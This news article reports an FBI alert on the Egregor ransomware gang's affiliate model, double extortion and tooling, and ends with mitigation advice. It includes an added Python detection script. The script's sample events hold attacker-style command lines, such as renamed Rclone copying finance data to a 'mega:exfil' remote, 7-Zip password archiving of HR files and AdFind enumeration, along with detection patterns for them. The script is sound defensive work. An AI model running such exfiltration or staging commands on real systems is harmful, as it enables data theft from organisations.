FBI Issues Alert on Growing Egregor Ransomware Threat
Bureau and Security Experts Warn About Gang's Effective Extortion Model
The FBI issued a warning this week over the growing threat from the operators behind the Egregor ransomware variant and other cybercriminal gangs affiliated with the group.
The alert notes that, since September, the Egregor gang and its affiliates claim to have compromised approximately 150 corporate networks in the U.S. and other countries. In some cases, the extortion demands have reached $4 million, according to a previous report by cybersecurity firm Group-IB.
In addition to running its own intrusions, the Egregor operation has an affiliate program: affiliated cybercriminals carry out their own attacks with the ransomware and keep a percentage of any ransom the victim pays. Because each affiliate brings its own tooling and tradecraft, defending against and mitigating these attacks is harder.
"Because of the large number of actors involved in deploying Egregor, the tactics, techniques and procedures used in its deployment can vary widely, creating significant challenges for defense and mitigation," the FBI alert notes. "Egregor ransomware utilizes multiple mechanisms to compromise business networks, including targeting business network and employee personal accounts that share access with business networks or devices."
Other researchers have noted that Egregor is one of several cybercriminal operations that exfiltrates data before crypto-locking systems and files and then threatens to leak the information unless it receives a ransom from the victim. The now-defunct Maze group began using this tactic in November 2019, after which more than a dozen other operators - including the REvil, aka Sodinokibi, gang - followed suit.
While fairly new, the Egregor gang and its affiliates have been tied to several high-profile attacks over the past five months, including those that targeted a Canadian public transportation agency and a Dutch human resources and staffing firm in December. The ransomware is also believed to have compromised the networks of Barnes & Noble and Kmart (see: Egregor Ransomware Slams HR Firm and Transport Agency).
The FBI alert notes that the operators behind Egregor typically use phishing emails with malicious attachments or links as the initial attack vector. The gang also exploits vulnerabilities in Microsoft's Remote Desktop Protocol (RDP) and in VPN products to gain initial access before moving laterally through the network.
Once the network is compromised, Egregor deploys legitimate penetration-testing and administration tools - Cobalt Strike for post-exploitation command and control, Advanced IP Scanner for host discovery and AdFind for Active Directory enumeration - to escalate to administrative privileges and move laterally through the network.
The gang or its affiliates also use tools such as Rclone, which is sometimes hidden or renamed as "svchost" to blend in with the legitimate Windows Service Host process, and 7-Zip to stage and exfiltrate data before the final ransomware payload is delivered and files are encrypted, according to the FBI.
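The tool chain above is noisy in process-creation telemetry if you know what to look for. As an added example, not code from the FBI alert or from this article, the following script triages Sysmon Event ID 1-style process events for exactly the signals the alert describes: an "svchost.exe" running outside System32/SysWOW64 or carrying Rclone-style arguments, AdFind enumeration, Advanced IP Scanner execution, and 7-Zip creating a password-protected archive. The sample events are constructed for illustration (field names, hosts and users are assumptions, not real telemetry), and the rules are heuristics, not a complete detection.

```python
"""Triage process-creation events for Egregor-style tooling (renamed Rclone,
AdFind, Advanced IP Scanner, 7-Zip archive staging). Example code, not the
FBI's or any vendor's detection logic."""
import json
import ntpath
import re

# Constructed sample events in a simplified Sysmon Event ID 1 shape.
# They are made up for this example and are not real telemetry.
SAMPLE_EVENTS = [
    json.dumps({"host": "WS01", "user": "CORP\\jdoe", "parent": "services.exe",
                "image": "C:\\Windows\\System32\\svchost.exe",
                "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"}),
    json.dumps({"host": "FS02", "user": "CORP\\svc_backup", "parent": "cmd.exe",
                "image": "C:\\Users\\Public\\svchost.exe",
                "cmdline": "svchost.exe copy D:\\Finance mega:exfil --transfers 32 --config C:\\Users\\Public\\rc.conf"}),
    json.dumps({"host": "DC01", "user": "CORP\\jdoe", "parent": "cmd.exe",
                "image": "C:\\Temp\\adfind.exe",
                "cmdline": "adfind.exe -f objectcategory=computer -csv"}),
    json.dumps({"host": "WS02", "user": "CORP\\asmith", "parent": "explorer.exe",
                "image": "C:\\Users\\asmith\\Downloads\\advanced_ip_scanner.exe",
                "cmdline": "advanced_ip_scanner.exe"}),
    json.dumps({"host": "FS02", "user": "CORP\\svc_backup", "parent": "cmd.exe",
                "image": "C:\\Program Files\\7-Zip\\7z.exe",
                "cmdline": "7z.exe a -pSecret123 -mhe=on C:\\Users\\Public\\data.7z D:\\HR"}),
    json.dumps({"host": "WS03", "user": "CORP\\asmith", "parent": "explorer.exe",
                "image": "C:\\Program Files\\7-Zip\\7z.exe",
                "cmdline": "7z.exe x report.7z"}),
]

# The only directories a genuine svchost.exe should ever run from.
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# An rclone subcommand followed somewhere by an rclone-specific flag or a
# "remote:" target. The remote name must be two or more characters so that
# drive letters such as D:\ do not match.
RCLONE_PATTERN = re.compile(
    r"(?i)\b(copy|sync|move|copyto)\b(?=.*(\s--config\b|\s--transfers\b|\s[a-z0-9_-]{2,}:(?!\\)))"
)


def _image_name(ev):
    return ntpath.basename(ev["image"]).lower()


def check_svchost_masquerade(ev):
    """Flag svchost.exe outside its home directories or with the wrong parent."""
    if _image_name(ev) != "svchost.exe":
        return None
    if ntpath.dirname(ev["image"]).lower() not in LEGIT_SVCHOST_DIRS:
        return "svchost.exe running outside System32/SysWOW64 (possible renamed Rclone)"
    if ev["parent"].lower() != "services.exe":
        return "svchost.exe not spawned by services.exe"
    return None


def check_rclone_cmdline(ev):
    """Rclone renamed to anything still needs rclone arguments to work."""
    if RCLONE_PATTERN.search(ev["cmdline"]):
        return "Rclone-style command line (subcommand plus remote/config flags)"
    return None


def check_adfind(ev):
    if _image_name(ev) == "adfind.exe" or re.search(r"(?i)\badfind(\.exe)?\b", ev["cmdline"]):
        return "AdFind Active Directory enumeration"
    return None


def check_ip_scanner(ev):
    if _image_name(ev).startswith("advanced_ip_scanner"):
        return "Advanced IP Scanner network discovery"
    return None


def check_7zip_staging(ev):
    """7-Zip 'a' (add) with a -p password is typical pre-exfiltration staging."""
    if _image_name(ev) not in {"7z.exe", "7za.exe", "7zr.exe"}:
        return None
    args = ev["cmdline"].split()
    if len(args) > 1 and args[1].lower() == "a" and any(a.startswith("-p") for a in args[2:]):
        return "7-Zip creating a password-protected archive (possible exfiltration staging)"
    return None


RULES = [check_svchost_masquerade, check_rclone_cmdline, check_adfind,
         check_ip_scanner, check_7zip_staging]


def triage(lines):
    """Run every rule over each JSON event line and return the findings."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        for rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "rule": rule.__name__, "detail": detail})
    return findings


def hosts_by_rule(findings):
    """Group triggered rule names per host so multi-stage activity stands out."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["host"], set()).add(f["rule"])
    return grouped


if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['host']:<5} {f['user']:<16} {f['rule']:<25} {f['detail']}")
    print(hosts_by_rule(results))
```

On the constructed sample, the legitimate svchost.exe on WS01 and the plain 7-Zip extraction on WS03 produce nothing, while FS02 trips three rules (masqueraded binary, Rclone arguments, password-protected archive), which is the staging-then-exfiltration sequence the FBI describes and is worth escalating ahead of a single AdFind or scanner hit.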
"There are a couple of unusual things about Egregor," says Brett Callow, a threat analyst at security firm Emsisoft. "First, it can spit out the ransom note on any connected printer - which seems like a somewhat odd move as it often results in incidents quickly becoming public knowledge, meaning companies no longer have the incentive to pay quickly and quietly to avoid publicity. Secondly, the group initially racked up victims at an unprecedented rate. This is probably because multiple threat actors joined Egregor's affiliate program after the Maze group ended its operation, taking with them details of compromised networks that had yet to be exploited."
And while Egregor's operators have developed methods to hide their tactics and techniques - and have obfuscated the malware's code to hinder analysis - Callow says that the ransomware itself behaves much like other crypto-locking malware.
Jamie Hart, a cyberthreat intelligence analyst at security firm Digital Shadows, says Egregor shares many similarities with the now-defunct Maze ransomware gang, targeting the same types of victims and using similar language in its ransom notes.
"Significant similarities in the profiles of their victims and analysis of ransom notes indicate that the Maze ransomware operators, which closed operations in October 2020, are now running the Egregor ransomware variant," Hart says. "Although neither group has confirmed this theory, the timeline of Maze calling it quits is interestingly coincidental to Egregor taking off. Activity conducted by Egregor suggests the operators are extremely sophisticated and likely have experience in the ransomware landscape."
The FBI says organizations can take several steps to mitigate the risk of Egregor and other ransomware attacks, including:
- Backing up critical data offline;
- Ensuring that copies of critical data are in the cloud or on an external hard drive or storage device;
- Securing backups so that the backed-up data cannot be modified or deleted from the systems it was taken from;
- Using two-factor authentication;
- Prioritizing patching of public-facing remote access products and applications, including recent RDP vulnerabilities such as CVE-2020-0609, CVE-2020-0610 and CVE-2020-16896;
- Reviewing suspicious .bat and .dll files, files containing reconnaissance data, and exfiltration tools found on the network.
The FBI also notes that those who are targeted by ransomware should not pay the ransom because that could encourage additional criminal activity. The U.S. Department of the Treasury has also warned organizations not to pay ransoms, noting they could face sanctions (see: Treasury Dept. Warns Against Facilitating Ransom Payments).